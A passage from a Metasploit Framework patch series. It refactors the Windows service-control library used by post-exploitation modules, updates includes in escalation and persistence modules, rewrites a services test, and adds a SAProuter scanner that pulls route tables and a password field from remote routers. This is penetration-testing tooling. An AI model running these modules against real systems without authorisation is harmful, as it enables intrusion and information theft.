adv.CreateServiceA(manag["return"],name,display_name, - 0x0010,0X00000010,startup,0,executable_on_host,nil,nil,nil,nil,nil) + newservice = adv.CreateServiceA(manager, name, display_name, + 0x0010, 0X00000010, startup, 0, executable_on_host, + nil, nil, nil, nil, nil) adv.CloseServiceHandle(newservice["return"]) - adv.CloseServiceHandle(manag["return"]) - #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010 - #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0 if newservice["GetLastError"] == 0 return true else return false end - else - raise "Could not open Service Control Manager, Access Denied" end end # # Start a service. # - # Returns 0 if service started, 1 if service is already started and 2 if - # service is disabled. + # @param name [String] Service name (not display name) + # @param server [String,nil] A hostname or IP address. Default is the + # remote localhost + # + # @return [Fixnum] 0 if service started successfully, 1 if it failed + # because the service is already running, 2 if it is disabled + # + # @raise [RuntimeError] if OpenServiceA failed # def service_start(name, server=nil) - machine_str = server ? "\\\\#{server}" : nil adv = session.railgun.advapi32 - manag = adv.OpenSCManagerA(machine_str,nil,1) - if(manag["return"] == 0) - raise "Could not open Service Control Manager, Access Denied" - end - #open with SERVICE_START (0x0010) - servhandleret = adv.OpenServiceA(manag["return"],name,0x10) - if(servhandleret["return"] == 0) - adv.CloseServiceHandle(manag["return"]) - raise "Could not Open Service, Access Denied" - end - retval = adv.StartServiceA(servhandleret["return"],0,nil) - adv.CloseServiceHandle(servhandleret["return"]) - adv.CloseServiceHandle(manag["return"]) - if retval["GetLastError"] == 0 - return 0 - elsif retval["GetLastError"] == 1056 - return 1 - elsif retval["GetLastError"] == 1058 - return 2 + open_sc_manager(:host=>server, :access=>1) do |manager| + # SC_HANDLE WINAPI OpenService( + # _In_ SC_HANDLE hSCManager, + # _In_ LPCTSTR lpServiceName, + # _In_ DWORD dwDesiredAccess + # ); + # open with access SERVICE_START (0x0010) + handle = adv.OpenServiceA(manager, name, 0x10) + if(handle["return"] == 0) + raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") + end + retval = adv.StartServiceA(handle["return"],0,nil) + adv.CloseServiceHandle(handle["return"]) + + # This is terrible. Magic return values should be refactored to + # something meaningful. + case retval["GetLastError"] + when 0; return 0 # everything worked + when 1056; return 1 # service already started + when 1058; return 2 # service disabled + end end end # # Stop a service. # - # Returns 0 if service is stopped successfully, 1 if service is already - # stopped or disabled and 2 if the service can not be stopped. + # @param (see #service_start) + # @return [Fixnum] 0 if service stopped successfully, 1 if it failed + # because the service is already stopped or disabled, 2 if it + # cannot be stopped for some other reason. + # + # @raise (see #service_start) # def service_stop(name, server=nil) - machine_str = server ? "\\\\#{server}" : nil adv = session.railgun.advapi32 - manag = adv.OpenSCManagerA(machine_str,nil,1) - if(manag["return"] == 0) - raise "Could not open Service Control Manager, Access Denied" - end - #open with SERVICE_STOP (0x0020) - servhandleret = adv.OpenServiceA(manag["return"],name,0x30) - if(servhandleret["return"] == 0) - adv.CloseServiceHandle(manag["return"]) - raise "Could not Open Service, Access Denied" - end - retval = adv.ControlService(servhandleret["return"],1,56) - adv.CloseServiceHandle(servhandleret["return"]) - adv.CloseServiceHandle(manag["return"]) - if retval["GetLastError"] == 0 - return 0 - elsif retval["GetLastError"] == 1062 - return 1 - elsif retval["GetLastError"] == 1052 - return 2 + + # SC_MANAGER_SERVICE_STOP (0x0020) + open_sc_manager(:host=>server, :access=>1) do |manager| + # open with SERVICE_STOP (0x0020) + handle = adv.OpenServiceA(manager, name, 0x20) + if(handle["return"] == 0) + raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") + end + retval = adv.ControlService(handle["return"],1,56) + adv.CloseServiceHandle(handle["return"]) + + case retval["GetLastError"] + when 0; return 0 # worked + when 1062; return 1 # already stopped or disabled + when 1052; return 2 # cannot be stopped + end end end # # Delete a service. # + # @param (see #service_start) + # def service_delete(name, server=nil) - machine_str = server ? "\\\\#{server}" : nil adv = session.railgun.advapi32 - # #define SC_MANAGER_ALL_ACCESS 0xF003F - manag = adv.OpenSCManagerA(machine_str,nil,0xF003F) - if (manag["return"] == 0) - raise "Could not open Service Control Manager, Access Denied" + open_sc_manager(:host=>server) do |manager| + # Now to grab a handle to the service. + # Thank you, Wine project for defining the DELETE constant since it, + # and all its friends, are missing from the MSDN docs. + # #define DELETE 0x00010000 + handle = adv.OpenServiceA(manager, name, 0x10000) + if (handle["return"] == 0) + raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") + end + + # Lastly, delete it + adv.DeleteService(handle["return"]) + + adv.CloseServiceHandle(handle["return"]) + + handle["GetLastError"] end - - # Now to grab a handle to the service. - # Thank you, Wine project for defining the DELETE constant since it, - # and all its friends, are missing from the MSDN docs. - # #define DELETE 0x00010000 - servhandleret = adv.OpenServiceA(manag["return"],name,0x10000) - if (servhandleret["return"] == 0) - adv.CloseServiceHandle(manag["return"]) - raise "Could not Open Service, Access Denied" - end - - # Lastly, delete it - adv.DeleteService(servhandleret["return"]) - - adv.CloseServiceHandle(manag["return"]) - adv.CloseServiceHandle(servhandleret["return"]) end end diff --git a/lib/msf/core/post/windows/shadowcopy.rb b/lib/msf/core/post/windows/shadowcopy.rb index 9d141f6e6d..cfa76ec087 100644 --- a/lib/msf/core/post/windows/shadowcopy.rb +++ b/lib/msf/core/post/windows/shadowcopy.rb @@ -10,7 +10,7 @@ module Windows # http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html module ShadowCopy - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services # # Get the device name for the shadow copy, which is used when accessing diff --git a/lib/msf/scripts/meterpreter/services.rb b/lib/msf/scripts/meterpreter/services.rb index 2585161af1..bb30056aa2 100644 --- a/lib/msf/scripts/meterpreter/services.rb +++ b/lib/msf/scripts/meterpreter/services.rb @@ -6,7 +6,7 @@ module Scripts module Meterpreter module Common -include ::Msf::Post::Windows::WindowsServices +include ::Msf::Post::Windows::Services end end diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index c797df5e28..f0304580e6 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Post::Common - include Post::Windows::WindowsServices + include Post::Windows::Services include Exploit::EXE include Post::File diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index 7fd65d4c05..bdc5639e5a 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -12,7 +12,7 @@ require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services def initialize(info={}) super( update_info( info, diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index 17c61e9e6b..e5f83723d9 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File - include Post::Windows::WindowsServices + include Post::Windows::Services def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb index 43bd752774..5a24900366 100644 --- a/modules/post/windows/escalate/net_runtime_modify.rb +++ b/modules/post/windows/escalate/net_runtime_modify.rb @@ -15,7 +15,7 @@ require 'rex' class Metasploit3 < Msf::Post - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/escalate/service_permissions.rb b/modules/post/windows/escalate/service_permissions.rb index 4aaeed3436..77780e2921 100644 --- a/modules/post/windows/escalate/service_permissions.rb +++ b/modules/post/windows/escalate/service_permissions.rb @@ -16,7 +16,7 @@ require 'msf/core//post/windows/services' class Metasploit3 < Msf::Post - include ::Msf::Post::Windows::WindowsServices + include ::Msf::Post::Windows::Services def initialize(info={}) super( update_info( info, 'Name' => 'Windows Escalate Service Permissions Local Privilege Escalation', diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index 226ece1303..1da9558147 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -14,7 +14,7 @@ require 'msf/core/post/windows/services' class Metasploit3 < Msf::Post - include Post::Windows::WindowsServices + include Post::Windows::Services def initialize super( diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index 8698f83dff..746ecdc9d3 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -16,7 +16,7 @@ require 'msf/core/post/windows/services' class Metasploit3 < Msf::Post - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index 47e2da6796..2317b7829f 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post include Msf::Post::Windows::Accounts include Msf::Post::Windows::Registry - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::File diff --git a/modules/post/windows/manage/persistence.rb b/modules/post/windows/manage/persistence.rb index 257b80a03e..decf1294cb 100644 --- a/modules/post/windows/manage/persistence.rb +++ b/modules/post/windows/manage/persistence.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services def initialize(info={}) super( update_info( info, diff --git a/test/modules/post/test/services.rb b/test/modules/post/test/services.rb index bee5a2e639..e75484a2d6 100644 --- a/test/modules/post/test/services.rb +++ b/test/modules/post/test/services.rb @@ -6,35 +6,124 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/services' +load 'lib/msf/core/post/windows/services.rb' + class Metasploit3 < Msf::Post include Msf::Post::Windows::WindowsServices + include Msf::ModuleTest::PostTest + def initialize(info={}) super( update_info( info, 'Name' => 'services_post_testing', 'Description' => %q{ This module will test windows services methods within a shell}, 'License' => MSF_LICENSE, - 'Author' => [ 'kernelsmith'], + 'Author' => [ 'kernelsmith', 'egypt' ], 'Version' => '$Revision: 11663 $', 'Platform' => [ 'windows' ], - 'SessionTypes' => [ 'shell' ] + 'SessionTypes' => [ 'meterpreter', 'shell' ] )) register_options( [ - OptBool.new("VERBOSE" , [true, "Verbose test, shows service status after each test", false]), OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]), OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]), OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]), - OptString.new("MODE" , [true, "Mode to use for startup/create tests", "demand"]), OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]), OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]), + OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto", + ["auto", "manual", "disable"] + ]), ], self.class) end + def test_start + it "should start #{datastore["SSERVICE"]}" do + ret = true + results = service_start(datastore['SSERVICE']) + ret &&= (results == 0) + + ret + end + it "should stop #{datastore["SSERVICE"]}" do + ret = true + results = service_stop(datastore['SSERVICE']) + ret &&= (results == 0) + + ret + end + end + + def test_list + it "should list services" do + ret = true + results = service_list + + ret &&= results.kind_of? Array + ret &&= results.length > 0 + ret &&= results.include? datastore["QSERVICE"] + + ret + end + end + + def test_info + it "should return info on a given service" do + ret = true + results = service_info(datastore['QSERVICE']) + + ret &&= results.kind_of? Hash + if ret + ret &&= results.has_key? "Name" + ret &&= (results["Name"] == "Windows Management Instrumentation") + ret &&= results.has_key? "Startup" + ret &&= results.has_key? "Command" + ret &&= results.has_key? "Credentials" + end + + ret + end + end + + def test_create + it "should create a service" do + mode = case datastore["MODE"] + when "disable"; 4 + when "manual"; 3 + when "auto"; 2 + else; 2 + end + ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode) + + ret + end + + it "should return info on the newly-created service" do + ret = true + results = service_info(datastore['NSERVICE']) + + ret &&= results.kind_of? Hash + ret &&= results.has_key? "Name" + ret &&= (results["Name"] == datastore["DNAME"]) + ret &&= results.has_key? "Startup" + ret &&= (results["Startup"].downcase == datastore["MODE"]) + ret &&= results.has_key? "Command" + ret &&= results.has_key? "Credentials" + + ret + end + + it "should delete the new service" do + ret = service_delete(datastore['NSERVICE']) + + ret + end + end + + +=begin def run - blab = datastore['VERBOSE'] print_status("Running against session #{datastore["SESSION"]}") print_status("Session type is #{session.type}") @@ -43,21 +132,6 @@ class Metasploit3 < Msf::Post print_line("than the windows SCM, just make sure the errors are sane. You can") print_line("set VERBOSE to true to see more details") - print_status() - print_status("TESTING service_list") - results = service_list - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING service_list_running") - results = service_list_running - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING service_info on servicename: #{datastore["QSERVICE"]}") - results = service_info(datastore['QSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status() print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}") results = service_query_ex(datastore['QSERVICE']) @@ -76,15 +150,6 @@ class Metasploit3 < Msf::Post print_status("Current status of this service " + "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab - print_status() - print_status("TESTING service_create on servicename: #{datastore['NSERVICE']} using\n" + - "display_name: #{datastore['DNAME']}, executable_on_host: " + - "#{datastore['BINPATH']}, and startupmode: #{datastore['MODE']}") - results = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],datastore['MODE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab - print_status() print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}") results = service_start(datastore['SSERVICE']) @@ -110,5 +175,6 @@ class Metasploit3 < Msf::Post print_status() print_status("Testing complete.") end +=end end From 7a6ccb92ab3f9cd268ee59a8149cab1529cb1f76 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 6 Nov 2012 18:29:42 -0600 Subject: [PATCH 009/154] Unfubar the threading for #service_list Also makes the test for service_start a little more resilient in case W32Time is already started --- lib/msf/core/post/windows/services.rb | 26 +++++++++++++------------- test/modules/post/test/services.rb | 9 ++++++--- 2 files changed, 19 insertions(+), 16 deletions(-) diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index 76b0f10e48..3a2dea9c48 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -91,22 +91,22 @@ module Services serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services" a =[] services = [] - registry_enumkeys(serviceskey).each do |s| - 1.upto 10 do - a.push(::Thread.new(s) { |sk| - begin - srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s - if srvtype =~ /32|16/ - services << sk - end - rescue - end - }) - end - until a.empty? + keys = registry_enumkeys(serviceskey) + keys.each do |s| + if a.length >= 10 a.first.join a.delete_if {|x| not x.alive?} end + t = framework.threads.spawn(self.refname+"-ServiceRegistryList",false,s) { |sk| + begin + srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s + if srvtype == "32" or srvtype == "16" + services << sk + end + rescue + end + } + a.push(t) end return services diff --git a/test/modules/post/test/services.rb b/test/modules/post/test/services.rb index e75484a2d6..c619576180 100644 --- a/test/modules/post/test/services.rb +++ b/test/modules/post/test/services.rb @@ -6,11 +6,9 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/services' -load 'lib/msf/core/post/windows/services.rb' - class Metasploit3 < Msf::Post - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services include Msf::ModuleTest::PostTest @@ -42,6 +40,11 @@ class Metasploit3 < Msf::Post it "should start #{datastore["SSERVICE"]}" do ret = true results = service_start(datastore['SSERVICE']) + if results != 0 + # Failed the first time, try to stop it first, then try again + service_stop(datastore['SSERVICE']) + results = service_start(datastore['SSERVICE']) + end ret &&= (results == 0) ret From 5d7414511ad5c548788b4667af79f8158ebb2b45 Mon Sep 17 00:00:00 2001 From: nmonkee Date: Wed, 7 Nov 2012 11:06:03 +0000 Subject: [PATCH 010/154] SAPRouter Admin Request (display remote route information) --- .../scanner/sap/sap_router_info_request.rb | 159 ++++++++++++++++++ 1 file changed, 159 insertions(+) create mode 100644 modules/auxiliary/scanner/sap/sap_router_info_request.rb diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb new file mode 100644 index 0000000000..f0ef4c2310 --- /dev/null +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -0,0 +1,159 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +## +# This module is based on, inspired by, or is a port of a plugin available in +# the Onapsis Bizploit Opensource ERP Penetration Testing framework - +# http://www.onapsis.com/research-free-solutions.php. +# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts +# in producing the Metasploit modules and was happy to share his knowledge and +# experience - a very cool guy. I'd also like to thank Chris John Riley, +# Ian de Villiers and Joris van de Vis who have Beta tested the modules and +# provided excellent feedback. Some people just seem to enjoy hacking SAP :) +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::Tcp + + def initialize + super( + 'Name' => 'SAPRouter Admin Request', + 'Version' => '$Revision$', + 'Description' => %q{ + SAPRouter Admin Request (display remote route information). + http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm + }, + 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], + 'Author' => [ 'nmonkee' ], + 'License' => BSD_LICENSE + ) + register_options( + [ + Opt::RPORT(3299) + ], self.class) + end + + def get_data(size, packet_len) + info = '' + for i in 1..size + data = sock.recv(1) + packet_len -= 1 + if data == "\x00" + sock.recv(size - i) + packet_len -= size - i + return info, packet_len + break + elsif + info << data + end + end + end + + def run_host(ip) + type = 'ROUTER_ADM' + version = 0x26 + cmd = 0x2 + count = 0 + connected = 'false' + port = datastore['RPORT'] + source = '' + destination = '' + service = '' + ni_packet = type + [0,version,cmd,0,0].pack("c*") + ni_packet = [ni_packet.length].pack('N') << ni_packet + saptbl = Msf::Ui::Console::Table.new( + Msf::Ui::Console::Table::Style::Default, + 'Header' => "[SAP] SAProuter Connection Table for #{ip}", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' => + [ + "Source", + "Destination", + "Service" + ]) + begin + connect + rescue ::Rex::ConnectionRefused + print_status("#{ip}:#{datastore['RPORT']} - connection refused") + connected == 'false' + rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error + print_status("#{ip}:#{datastore['RPORT']} - connection timeout") + connected == 'false' + rescue ::Exception => e + print_error("#{ip}:#{datastore['RPORT']} - exception #{e.class} #{e} #{e.backtrace}") + connected == 'false' + end + if connected != 'false' + print_good("connected to saprouter") + print_good("sending ROUTER_ADM packet info request") + sock.put(ni_packet) + packet_len = sock.read(4).unpack('H*')[0].to_i 16 + print_good("got INFO response") + while packet_len !=0 + count += 1 + case count + when 1 + if packet_len > 150 + sock.recv(150) + packet_len -= 150 + source, packet_len = get_data(46,packet_len) + destination, packet_len = get_data(46,packet_len) + service, packet_len = get_data(30,packet_len) + sock.recv(2) + packet_len -= 2 + saptbl << [source, destination, service] + while packet_len !=0 + sock.recv(13) + packet_len -= 13 + source, packet_len = get_data(46,packet_len) + destination, packet_len = get_data(46,packet_len) + service, packet_len = get_data(30,packet_len) + term = sock.recv(2) + packet_len -= 2 + saptbl << [source, destination, service] + end + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + else + print_error("no connected clients :'(") + sock.recv(packet_len) + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + end + when 2 + data = sock.recv(packet_len) + packet_len -= packet_len + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + when 3 + clients = sock.recv(packet_len) + packet_len -= packet_len + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + when 4 + pwd = sock.recv(packet_len) + print_good(pwd) + packet_len -= packet_len + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + when 5 + routtab = sock.recv(packet_len) + print_good(routtab) + packet_len -= packet_len + packet_len = sock.recv(4).unpack('H*')[0].to_i 16 + end + if packet_len == 0 + break + end + end + disconnect + print(saptbl.to_s) + end + end +end From a4f6489e55061df397a13fe7710f808128b5a896 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 7 Nov 2012 19:05:37 -0600 Subject: [PATCH 011/154] Fix whitespace, thanks mfstidy! --- test/modules/post/test/services.rb | 366 ++++++++++++++--------------- 1 file changed, 183 insertions(+), 183 deletions(-) diff --git a/test/modules/post/test/services.rb b/test/modules/post/test/services.rb index c619576180..de0fc83744 100644 --- a/test/modules/post/test/services.rb +++ b/test/modules/post/test/services.rb @@ -1,183 +1,183 @@ -# -# by kernelsmith (kernelsmith+\x40+kernelsmith+\.com) -# - -require 'msf/core' -require 'rex' -require 'msf/core/post/windows/services' - -class Metasploit3 < Msf::Post - - include Msf::Post::Windows::Services - - include Msf::ModuleTest::PostTest - - def initialize(info={}) - super( update_info( info, - 'Name' => 'services_post_testing', - 'Description' => %q{ This module will test windows services methods within a shell}, - 'License' => MSF_LICENSE, - 'Author' => [ 'kernelsmith', 'egypt' ], - 'Version' => '$Revision: 11663 $', - 'Platform' => [ 'windows' ], - 'SessionTypes' => [ 'meterpreter', 'shell' ] - )) - register_options( - [ - OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]), - OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]), - OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]), - OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]), - OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]), - OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto", - ["auto", "manual", "disable"] - ]), - ], self.class) - - end - - def test_start - it "should start #{datastore["SSERVICE"]}" do - ret = true - results = service_start(datastore['SSERVICE']) - if results != 0 - # Failed the first time, try to stop it first, then try again - service_stop(datastore['SSERVICE']) - results = service_start(datastore['SSERVICE']) - end - ret &&= (results == 0) - - ret - end - it "should stop #{datastore["SSERVICE"]}" do - ret = true - results = service_stop(datastore['SSERVICE']) - ret &&= (results == 0) - - ret - end - end - - def test_list - it "should list services" do - ret = true - results = service_list - - ret &&= results.kind_of? Array - ret &&= results.length > 0 - ret &&= results.include? datastore["QSERVICE"] - - ret - end - end - - def test_info - it "should return info on a given service" do - ret = true - results = service_info(datastore['QSERVICE']) - - ret &&= results.kind_of? Hash - if ret - ret &&= results.has_key? "Name" - ret &&= (results["Name"] == "Windows Management Instrumentation") - ret &&= results.has_key? "Startup" - ret &&= results.has_key? "Command" - ret &&= results.has_key? "Credentials" - end - - ret - end - end - - def test_create - it "should create a service" do - mode = case datastore["MODE"] - when "disable"; 4 - when "manual"; 3 - when "auto"; 2 - else; 2 - end - ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode) - - ret - end - - it "should return info on the newly-created service" do - ret = true - results = service_info(datastore['NSERVICE']) - - ret &&= results.kind_of? Hash - ret &&= results.has_key? "Name" - ret &&= (results["Name"] == datastore["DNAME"]) - ret &&= results.has_key? "Startup" - ret &&= (results["Startup"].downcase == datastore["MODE"]) - ret &&= results.has_key? "Command" - ret &&= results.has_key? "Credentials" - - ret - end - - it "should delete the new service" do - ret = service_delete(datastore['NSERVICE']) - - ret - end - end - - -=begin - def run - blab = datastore['VERBOSE'] - print_status("Running against session #{datastore["SESSION"]}") - print_status("Session type is #{session.type}") - print_status("Verbosity is set to #{blab.to_s}") - print_status("Don't be surprised to see some errors as the script is faster") - print_line("than the windows SCM, just make sure the errors are sane. You can") - print_line("set VERBOSE to true to see more details") - - print_status() - print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}") - results = service_query_ex(datastore['QSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}") - results = service_query_config(datastore['QSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " + - "to #{datastore['MODE']}") - results = service_change_startup(datastore['QSERVICE'],datastore['MODE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab - - print_status() - print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}") - results = service_start(datastore['SSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab - print_status("Sleeping to give the service a chance to start") - select(nil, nil, nil, 2) # give the service time to start, reduces false negatives - - print_status() - print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}") - results = service_stop(datastore['SSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab - - print_status() - print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}") - results = service_delete(datastore['NSERVICE']) - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - print_status("Current status of this service " + - "#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab - print_status() - print_status("Testing complete.") - end -=end - -end +# +# by kernelsmith (kernelsmith+\x40+kernelsmith+\.com) +# + +require 'msf/core' +require 'rex' +require 'msf/core/post/windows/services' + +class Metasploit3 < Msf::Post + + include Msf::Post::Windows::Services + + include Msf::ModuleTest::PostTest + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Test Post::Windows::Services', + 'Description' => %q{ This module will test windows services methods within a shell}, + 'License' => MSF_LICENSE, + 'Author' => [ 'kernelsmith', 'egypt' ], + 'Version' => '$Revision: 11663 $', + 'Platform' => [ 'windows' ], + 'SessionTypes' => [ 'meterpreter', 'shell' ] + )) + register_options( + [ + OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]), + OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]), + OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]), + OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]), + OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]), + OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto", + ["auto", "manual", "disable"] + ]), + ], self.class) + + end + + def test_start + it "should start #{datastore["SSERVICE"]}" do + ret = true + results = service_start(datastore['SSERVICE']) + if results != 0 + # Failed the first time, try to stop it first, then try again + service_stop(datastore['SSERVICE']) + results = service_start(datastore['SSERVICE']) + end + ret &&= (results == 0) + + ret + end + it "should stop #{datastore["SSERVICE"]}" do + ret = true + results = service_stop(datastore['SSERVICE']) + ret &&= (results == 0) + + ret + end + end + + def test_list + it "should list services" do + ret = true + results = service_list + + ret &&= results.kind_of? Array + ret &&= results.length > 0 + ret &&= results.include? datastore["QSERVICE"] + + ret + end + end + + def test_info + it "should return info on a given service" do + ret = true + results = service_info(datastore['QSERVICE']) + + ret &&= results.kind_of? Hash + if ret + ret &&= results.has_key? "Name" + ret &&= (results["Name"] == "Windows Management Instrumentation") + ret &&= results.has_key? "Startup" + ret &&= results.has_key? "Command" + ret &&= results.has_key? "Credentials" + end + + ret + end + end + + def test_create + it "should create a service" do + mode = case datastore["MODE"] + when "disable"; 4 + when "manual"; 3 + when "auto"; 2 + else; 2 + end + ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode) + + ret + end + + it "should return info on the newly-created service" do + ret = true + results = service_info(datastore['NSERVICE']) + + ret &&= results.kind_of? Hash + ret &&= results.has_key? "Name" + ret &&= (results["Name"] == datastore["DNAME"]) + ret &&= results.has_key? "Startup" + ret &&= (results["Startup"].downcase == datastore["MODE"]) + ret &&= results.has_key? "Command" + ret &&= results.has_key? "Credentials" + + ret + end + + it "should delete the new service" do + ret = service_delete(datastore['NSERVICE']) + + ret + end + end + + +=begin + def run + blab = datastore['VERBOSE'] + print_status("Running against session #{datastore["SESSION"]}") + print_status("Session type is #{session.type}") + print_status("Verbosity is set to #{blab.to_s}") + print_status("Don't be surprised to see some errors as the script is faster") + print_line("than the windows SCM, just make sure the errors are sane. You can") + print_line("set VERBOSE to true to see more details") + + print_status() + print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}") + results = service_query_ex(datastore['QSERVICE']) + print_status("RESULTS: #{results.class} #{results.pretty_inspect}") + + print_status() + print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}") + results = service_query_config(datastore['QSERVICE']) + 